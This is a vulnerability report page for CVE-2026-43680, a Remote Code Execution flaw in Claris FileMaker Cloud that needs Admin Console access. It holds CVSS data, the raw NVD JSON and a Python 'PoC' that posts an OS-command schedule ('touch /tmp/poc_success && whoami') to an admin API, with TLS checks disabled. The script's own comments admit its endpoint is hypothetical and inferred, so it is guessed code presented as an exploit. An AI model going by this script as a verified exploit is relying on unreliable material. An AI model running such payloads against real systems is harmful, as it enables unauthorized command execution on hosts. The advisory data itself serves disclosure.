Security Vulnerability Report
CVE-2026-43680 CVSS 7.2 HIGH

CVE-2026-43680

Published: 2026-05-12 23:16:18
Last Modified: 2026-05-14 13:53:04

Description

A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to bypass a front-end restriction on OS Script schedule types and execute arbitrary operating system commands on the underlying host. This issue is fixed in FileMaker Cloud 2.22.0.5.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:* - VULNERABLE
Claris FileMaker Cloud < 2.22.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target API endpoint for creating schedules
# (hypothetical endpoint inferred from the vulnerability description)
target_url = "https://<filemaker-cloud-host>/fmi/admin/api/v1/schedules"

# Admin session cookie or token (required because of the PR:H privilege requirement)
admin_session_token = "<VALID_ADMIN_CONSOLE_TOKEN>"

# Request headers
headers = {
    "Authorization": f"Bearer {admin_session_token}",
    "Content-Type": "application/json",
}

# PoC payload: bypassing the front-end restriction on OS Script schedule types.
# The front end normally restricts 'scriptType' to safe options, but the request
# is sent to the backend directly with 'system'.
payload = {
    "scheduleName": "Malicious_PoC_Task",
    "scriptType": "system",  # Bypass front-end restriction
    "command": "touch /tmp/poc_success && whoami",  # Arbitrary OS command to execute
    "enabled": True,  # Python boolean (the original 'true' is not valid Python)
}

try:
    # Send the request straight to the backend API
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    if response.status_code == 201:
        print("[+] PoC Successful: Malicious schedule created.")
        print("[+] The command 'touch /tmp/poc_success' should have been executed on the host.")
    else:
        print(f"[-] PoC Failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

References

https://support.claris.com/s/answerview?anum=000049153&language=en_US (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-43680",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T23:16:17.870",
    "lastModified": "2026-05-14T13:53:04.090",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to bypass a front-end restriction on OS Script schedule types and execute arbitrary operating system commands on the underlying host. This issue is fixed in FileMaker Cloud 2.22.0.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.22.0.5",
                "matchCriteriaId": "A0DBAD4E-B906-4130-8D79-FBDD67974E60"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.claris.com/s/answerview?anum=000049153&language=en_US",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}